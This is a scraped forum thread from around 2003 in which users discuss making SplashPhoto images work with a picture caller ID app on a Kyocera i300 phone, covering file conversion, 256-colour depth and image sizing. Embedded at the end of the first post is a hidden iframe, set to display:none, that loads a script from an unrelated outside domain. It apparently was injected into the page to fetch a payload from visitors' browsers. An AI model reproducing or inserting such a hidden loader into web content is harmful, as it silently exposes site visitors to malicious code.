+ Reply to Thread

I300picturecallerid and SplashPhoto

I was just wondering if there was a way to incorporate converted SplashPhoto pictures to the PDAapps I300picturecallerid?

I know that you can with the I330 but I was curious to know if this worked with the I300 as well.

If not, is there a way to convert .prc to Jpg?

I really like the way SplashPhoto converts and makes the images look at 256 color. I tired decreasing a jpeg manually down to 256 with Paint Shop Pro and it didn't come out anywhere as nice looking as did the converted SplashPhoto pics.

I tired the 15 day trial of PDAapps I300picturecallerid and for some strange reason it expired after 4 days. I didn't really get to play with it that much. So before I buy it I am just looking at options on how to clean up the photos to be viewed best at 8 bit.

Any help or info on this would be really appreciated.

Thank you.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

i have picture callerid and splashphoto and believe me the picture callerid is not much to play with.

don't get me wrong it's a useful app but very limited.
    this app ready needs a bite of improvement.

if you chose to buy it. keep in mind, when converting pictures.
    name all your pictures with the a numbers and then the person name (1_pic, 2_pic and so on).

the reason why i say this is because when adding a picture later on. they are not in the some order, you will have to reprogram all those number to the right picture.

for splashphoto, will this is a great app and very useful but to get picture to link to picture callerid will not happen on less you use the calleridhelper (calleridhelper is the program you'll need to covert all your picture or add splashphoto picture prc)

calleridhelper then links all your picture to one prc.
    to add splashphoto prc go to file and add to pdb.
    you must add it one by one, this is why you should name your picture with numbers. as you add pictures they will be in alpha and numeric order. (make number first)

also no matter what app you chose to edite your picture they all will look the same.

all picture need to be 256 color 8 bite and 160/160 pixle and then you'll have the choice to chose form 160/160 or 78/78 pictures.
    (also try a larger pic with 600 resolution and bring it down to 160/160 it will look a bit better)

i use 78/78 only because when you use the larger 160/160 you will not be able to see the talk bottom but if you like the larger view. just go to the phone pref setup and select anykey answer (app-keys) to answer your phone.

hope this help and you understand what i'm tring to say.
    i some time have a hard time telling people how to use things

if you need more info like me know i have these app.

Last edited by i300user; 07-19-2003 at 09:14 AM.

I300user-

Thanks for all your help and info there!

I have a question about this:

calleridhelper then links all your picture to one prc.
    to add splashphoto prc go to file and add to pdb.
    How did you do this? When I open the callerid helper it is looking for a pdb file while the pics on splashphoto are prc.

Thanks!

i300user...you still alive?? lol

you must be busy

I was going to email you instead but your email isn't activated in the forum.

busy i am not dead (yet) lol.

about the splash photo, i made a mistake.

your right you can't. sorry.

i thought i did it when i first got this apps, but when i went to try it again it didn't work.

i must be losing my mind.

also im sorry if i don't respond right alway.

im too busy designing web site. logo, illustration, making beat, and so on. the list go on

im too busy designing web site. logo, illustration, making beat, and so on. the list go on
    I hear ya! When you say making beat what do you mean? beat as in music? like producing tracks and making beats?

If you can, do me a favor and email me at:

bahr_kode@hotmail.com

Thanks!

beats as music.

if you like visit our site at
    nawteechild.com

the site is not up to my liking but with the little time i have, it well have to do for now.